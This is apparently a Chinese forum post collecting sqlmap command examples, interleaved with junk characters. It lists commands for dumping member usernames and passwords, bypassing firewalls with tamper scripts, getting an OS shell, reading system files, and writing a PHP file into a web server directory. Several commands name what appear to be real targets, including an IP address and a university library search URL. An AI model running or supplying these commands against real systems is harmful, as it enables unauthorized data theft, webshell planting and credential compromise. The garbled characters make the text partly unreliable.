sqlmap使用实例

admin

/pentest/database/sqlmap
( {3 f' S5 `( K$ F
( F" P) j( \6 V9 w4 q) I/ w  pupdate :::::>     in the folder   after  execute    following   order : svn update
8 [+ e" u% l% i, G6 n: F
) g7 F$ U. l" e! W9 Gsqlmap.py -r 1.txt --current-db
) F: N+ a6 W% l( o( Z- Q1 X* A  t
0 |1 k% A9 }+ r* wv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
* q0 u/ y/ L, p9 t# G' H$ v
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
猜解数据库
" w& t  g, w) a6 v" q  c./sqlmap.py -u "injection-url" --dbs
* P9 }3 \, t, n: Tsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"

0 f4 p" [) _& u6 r猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables

sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
; L$ u/ v4 l5 \* h
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
+ r" @1 t3 n4 O) p* b2 D
9 u# E' s% e' c: C1 vsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
6 o) F/ m0 x7 L8 l  a7 {* Qsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
# d9 L$ S7 _, l( H! h
- U( ^4 K* Q8 _. s. P; O9 g* ?sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
! d8 O. b/ o! ysqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
* M9 n3 g: J. a+ T/ p
& H+ f) u1 R6 G! E+ P- usqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
$ S0 b& l9 F2 Asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns

sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
) R7 ]' q, r# F$ asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"

sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
&submit=Go
$ h$ ~4 v+ s1 v猜解值
% ]8 Q" {8 q3 J6 s./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
========================================================
. w$ K9 R5 }, Q8 Q  D* \) I搜索表名中包括mana字符的
# U: M1 g0 n4 Q; a  C1 |+ B& }7 G/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
, a* d6 l8 k7 P3 D' D$ a& J/sqlmap.py -u "injection-url" --sql-shell
2 M- S3 z& f) ~% _# x8 F读取指定文件（需权限）
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
' J4 N+ M1 V5 c. X9 J查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
本地文件 写入 远程目标绝对路径
+ g) C- b8 j, M' M4 B0 _/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
' q1 M/ B6 M  @! s( G* Bsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
6 G$ V: w  ~$ @
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
5 S% F+ b7 t6 Y) O$ v" C查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/ F- \+ M' X' }5 S/sqlmap.py -u "injection-url" --is-dba
1 `7 [8 e# K1 ?0 k" w/ T读取所有数据库用户或指定数据库用户的密码
% {3 T* n- i$ S9 h2 W; usqlmap.py -r 1.txt --users --passwords
* {! B8 i! e" T1 Wsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
8 S2 C0 L6 k! S# `' ]
/sqlmap.py -u "injection-url" --passwords -U root
. K2 K. M$ n$ u! X8 Q. D
2 R4 W; f5 Z+ a7 I9 s--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

, V, i  c( G& `/ H% |" b$ z从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
$ V$ M" a- ^* j: A$ \# x/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
* `8 L* L8 t: H8 C" ^9 h- J
0 i/ H# C/ e& }* P5 d" l" N% X执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"